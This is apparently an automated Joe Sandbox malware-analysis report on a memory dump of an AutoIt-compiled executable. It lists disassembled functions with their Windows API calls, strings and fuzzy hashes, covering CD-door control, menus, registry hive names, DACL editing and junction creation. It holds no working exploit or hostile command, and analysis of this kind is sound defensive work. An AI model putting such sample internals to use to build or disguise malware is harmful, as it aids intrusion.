Opcode Fuzzy Hash: 664bf000aad649a5b19d0337a2b2ca517abaa9b29967fc62b331af19fdea931b
Instruction Fuzzy Hash: E661B1B1A00619FAEB24DF64CC86FBE77A8EB08710F10811DF915D61D1DB79AD50DB60

Function 007AA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,007CFB78), ref: 007AA0FC

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 007AA11E
__swprintf.LIBCMT ref: 007AA177
__swprintf.LIBCMT ref: 007AA190
_wprintf.LIBCMT ref: 007AA246
_wprintf.LIBCMT ref: 007AA264

Strings

Line %d (File "%s"):, xrefs: 007AA171, 007AA18A
%}, xrefs: 007AA0C9
Error: , xrefs: 007AA20E
^ ERROR, xrefs: 007AA1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 007AA241
"%s" (%d) : ==> %s:, xrefs: 007AA25F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%}
API String ID: 311963372-1266152252
Opcode ID: 3c68802324ca4e802bd299f6c46956ba739a56f6f5e101e41ff007128f42fed3
Instruction ID: b8e0065db80f44e4ced5db2dfc6a206bb3709a67104138fb0442b6e0989fab10
Opcode Fuzzy Hash: 3c68802324ca4e802bd299f6c46956ba739a56f6f5e101e41ff007128f42fed3
Instruction Fuzzy Hash: EA518E71900119FBCF15EBA0CD8AEEEB779AF44300F104265F505721A2EB396F69CB61

Function 007AA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

CharLowerBuffW.USER32(?,?), ref: 007AA636
GetDriveTypeW.KERNEL32 ref: 007AA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA730

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Strings

type cdaudio alias cd wait, xrefs: 007AA6AE
close cd wait, xrefs: 007AA71B
closed, xrefs: 007AA64A, 007AA653
open , xrefs: 007AA692
open, xrefs: 007AA65D
set cd door , xrefs: 007AA6D1
wait, xrefs: 007AA6ED
close, xrefs: 007AA63C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 29dcf27acc00138dfdbba9a2caa4f7d115c17e22b2fdd3eceb9fac35e1576151
Instruction ID: 5ac70c8b711f41ef24f18bef3dfc8435f511c0080af3b0020414c2fec469b856
Opcode Fuzzy Hash: 29dcf27acc00138dfdbba9a2caa4f7d115c17e22b2fdd3eceb9fac35e1576151
Instruction Fuzzy Hash: B9513CB1104305EFC704EF20C88586AB7F4FF94718F04896DF89A97261DB39AE0ACB52

Function 007AA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007AA47A
__swprintf.LIBCMT ref: 007AA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 007AA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AA4FE
_memset.LIBCMT ref: 007AA51D
_wcsncpy.LIBCMT ref: 007AA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007AA58E
CloseHandle.KERNEL32(00000000), ref: 007AA599
RemoveDirectoryW.KERNEL32(?), ref: 007AA5A2
CloseHandle.KERNEL32(00000000), ref: 007AA5AC

Strings

\, xrefs: 007AA4B2
\??\%s, xrefs: 007AA496
:, xrefs: 007AA4BD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 92169a41b276066306ad20ff20aad3d4cdbc84f89670308606e95bdd177fb03a
Instruction ID: 6e6f0090090870e633fea5456daa4d964f66a9edacec994e96ed33a493b22964
Opcode Fuzzy Hash: 92169a41b276066306ad20ff20aad3d4cdbc84f89670308606e95bdd177fb03a
Instruction Fuzzy Hash: 9031B0B1900249BBDB219FA0DC48FEB37BDEF89701F1041BAF909D2160E7789654CB29

Function 0077AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0077AB7B
___wtomb_environ.LIBCMT ref: 0077AB9D

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

__malloc_crt.LIBCMT ref: 0077ABC5
__malloc_crt.LIBCMT ref: 0077ABE2
_free.LIBCMT ref: 0077AC19
__recalloc_crt.LIBCMT ref: 0077AC52
__recalloc_crt.LIBCMT ref: 0077AC97
_strlen.LIBCMT ref: 0077ACC3
__calloc_crt.LIBCMT ref: 0077ACCD
_strlen.LIBCMT ref: 0077ACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0077AD0A
_free.LIBCMT ref: 0077AD24
_free.LIBCMT ref: 0077AD31
_free.LIBCMT ref: 0077AD43
__invoke_watson.LIBCMT ref: 0077AD5D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 27f8d54c771882834f85b4b4cb0436d193ced34ed21efeb887d21db3fdf8d7ae
Instruction ID: 6ebb50a1a39d3efa87e4aa8e4b4ed2530c17dbea9147755d27f6e150f7ef483e
Opcode Fuzzy Hash: 27f8d54c771882834f85b4b4cb0436d193ced34ed21efeb887d21db3fdf8d7ae
Instruction Fuzzy Hash: 7F61E2B2900305FFFF215F64D845B6D77A9EB953A1F248215E8099B1A1DB3C8840C6A2

Function 007CC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CC4EC
GetFocus.USER32 ref: 007CC4FC
GetDlgCtrlID.USER32(00000000), ref: 007CC507
_memset.LIBCMT ref: 007CC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007CC65D
GetMenuItemCount.USER32(?), ref: 007CC67D
GetMenuItemID.USER32(?,00000000), ref: 007CC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007CC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007CC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007CC779

Strings

0, xrefs: 007CC62A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 11c99b8bd94162ecad4dc0b028476f4002fbaef36340c320250f878df8baf856
Instruction ID: a32bcbf5bf5f48fa4d13c2b4b08156be44fd66e2b976ae3dec642cfc8f3d8db4
Opcode Fuzzy Hash: 11c99b8bd94162ecad4dc0b028476f4002fbaef36340c320250f878df8baf856
Instruction Fuzzy Hash: ED816A702083019FDB12CF24D985F6BBBE9FB88314F14452DF999A7291D738D915CBA2

Function 007983F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
Part of subcall function 0079874A: GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
Part of subcall function 0079874A: GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
Part of subcall function 0079874A: HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D

Part of subcall function 007987E7: GetProcessHeap.KERNEL32(00000008,00798240,00000000,00000000,?,00798240,?), ref: 007987F3
Part of subcall function 007987E7: HeapAlloc.KERNEL32(00000000,?,00798240,?), ref: 007987FA
Part of subcall function 007987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00798240,?), ref: 0079880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00798458
_memset.LIBCMT ref: 0079846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079848C
GetLengthSid.ADVAPI32(?), ref: 0079849D
GetAce.ADVAPI32(?,00000000,?), ref: 007984DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007984F6
GetLengthSid.ADVAPI32(?), ref: 00798513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00798522
HeapAlloc.KERNEL32(00000000), ref: 00798529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079854A
CopySid.ADVAPI32(00000000), ref: 00798551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00798582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007985A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007985BC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: a9f36d6475c36cc15003cb3d460f27aff23674161285ae0675cb9b331e3e61ad
Instruction ID: 4def944dc2fe2ba9387b1f195cdccf7d39fd91c21e7934bcc4fcaa5f6495b3db
Opcode Fuzzy Hash: a9f36d6475c36cc15003cb3d460f27aff23674161285ae0675cb9b331e3e61ad
Instruction Fuzzy Hash: 7861387190020AEFDF00DFA4EC45EAEBBB9FF05700F14816AE815A7291DB399A15CF61

Function 007B762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007B76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007B76AE
CreateCompatibleDC.GDI32(?), ref: 007B76BA
SelectObject.GDI32(00000000,?), ref: 007B76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007B771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007B7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007B777B
SelectObject.GDI32(00000006,?), ref: 007B7783
DeleteObject.GDI32(?), ref: 007B778C
DeleteDC.GDI32(00000006), ref: 007B7793
ReleaseDC.USER32(00000000,?), ref: 007B779E

Strings

(, xrefs: 007B7723

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b8d53c7c9473f9b07fb6fcf3291edb37a4151a56016eeb16b31d90b2cf81dc51
Instruction ID: b73521040524e9340f116d669535e02ca5bf0def4f8a4e135ba236c54f804d64
Opcode Fuzzy Hash: b8d53c7c9473f9b07fb6fcf3291edb37a4151a56016eeb16b31d90b2cf81dc51
Instruction Fuzzy Hash: C5513875904209EFCB15CFA8CC89EAEBBB9EF48710F14852DF94AA7210D735A940CB64

Function 00746BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00760B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00746C6C,?,00008000), ref: 00760BB7

Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00746E5A

Part of subcall function 007459CD: _wcscpy.LIBCMT ref: 00745A05

Part of subcall function 0076387D: _iswctype.LIBCMT ref: 00763885

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0077E8BF
Bad directive syntax error, xrefs: 0077EBC6
EA06, xrefs: 0077E87B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0077E84A
Unterminated string, xrefs: 0077EC0D
AU3!, xrefs: 00746CC1
Error opening the file, xrefs: 0077E866, 0077E8E1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 1febeee8110da462eae81d87a1a30c28908b1e67065f0488b4eda88957f8cfcf
Instruction ID: e2a4ce778468778995d42e2ff8084cb1d6e091eed5549bce12de51cfc45a93ec
Opcode Fuzzy Hash: 1febeee8110da462eae81d87a1a30c28908b1e67065f0488b4eda88957f8cfcf
Instruction Fuzzy Hash: 1F026B71108341DFCB14EF24C885AAFBBE5BF99354F04891DF48A972A2DB38D949CB52

Function 007445DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007445F9
GetMenuItemCount.USER32(00806890), ref: 0077D7CD
GetMenuItemCount.USER32(00806890), ref: 0077D87D
GetCursorPos.USER32(?), ref: 0077D8C1
SetForegroundWindow.USER32(00000000), ref: 0077D8CA
TrackPopupMenuEx.USER32(00806890,00000000,?,00000000,00000000,00000000), ref: 0077D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0077D8E9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 56c3f3e8dffed63be3364b1631bcd38bb8ab453813e58c1981673da948b1bab9
Instruction ID: 39d76d04f52104ed9780f6c68601bcc58b6481a0bc0e9f436f4cd8c142e8a148
Opcode Fuzzy Hash: 56c3f3e8dffed63be3364b1631bcd38bb8ab453813e58c1981673da948b1bab9
Instruction Fuzzy Hash: 6771E270601205BAEF349F24DC49FAABF65FF053A4F208216F529A61E1C7B96C20DB95

Function 007B8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007B8BEC
CoInitialize.OLE32(00000000), ref: 007B8C19
CoUninitialize.OLE32 ref: 007B8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 007B8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 007B8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007D2C0C), ref: 007B8E84
CoGetObject.OLE32(?,00000000,007D2C0C,?), ref: 007B8EA7
SetErrorMode.KERNEL32(00000000), ref: 007B8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007B8F3A
VariantClear.OLEAUT32(?), ref: 007B8F4A

Strings

,,}, xrefs: 007B8BD6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,}
API String ID: 2395222682-3650289849
Opcode ID: d5ea4d59ba7b930dd7e9d646f30aad871201e4b127b42bde9a1b2d91495a1acb
Instruction ID: cb4a386233183fe21407eb8a92c0d600f052d5731f485263f8930e3e04c5fa28
Opcode Fuzzy Hash: d5ea4d59ba7b930dd7e9d646f30aad871201e4b127b42bde9a1b2d91495a1acb
Instruction Fuzzy Hash: 62C124B1208305AFC740EF24C884A6BB7E9FF89748F00496DF5899B251DB35ED05CB62

Function 007C10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC

Strings

HKCU, xrefs: 007C11AC
HKEY_CURRENT_USER, xrefs: 007C119B
HKEY_CURRENT_CONFIG, xrefs: 007C1179
HKLM, xrefs: 007C113A
HKEY_LOCAL_MACHINE, xrefs: 007C1125
HKCC, xrefs: 007C118A
HKCR, xrefs: 007C1164
HKEY_CLASSES_ROOT, xrefs: 007C114F
HKU, xrefs: 007C11CE
HKEY_USERS, xrefs: 007C11BD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 36f79a783f7890f932ccad53b1806d895a3077dbd629de4b094dd982204fe152
Instruction ID: fe08504025f8d1630865b367e8071b61ea5cac4a0a8e8a928df596cef7bd6491
Opcode Fuzzy Hash: 36f79a783f7890f932ccad53b1806d895a3077dbd629de4b094dd982204fe152
Instruction Fuzzy Hash: 26412D3025024EDBCF10EFA0DC95AEA3724BF12340F94456CEE925B252DB3CAD1AC790

Function 007A5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Part of subcall function 00747A84: _memmove.LIBCMT ref: 00747B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A561C

Strings

play PlayMe wait, xrefs: 007A5606
status PlayMe mode, xrefs: 007A55CD
play PlayMe, xrefs: 007A5617
close PlayMe, xrefs: 007A55E3, 007A5610
open , xrefs: 007A5581
alias PlayMe, xrefs: 007A55AB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c388d561f18845eefa9ba5886733b62f294d3be39d150a353a8dfd5152337e8b
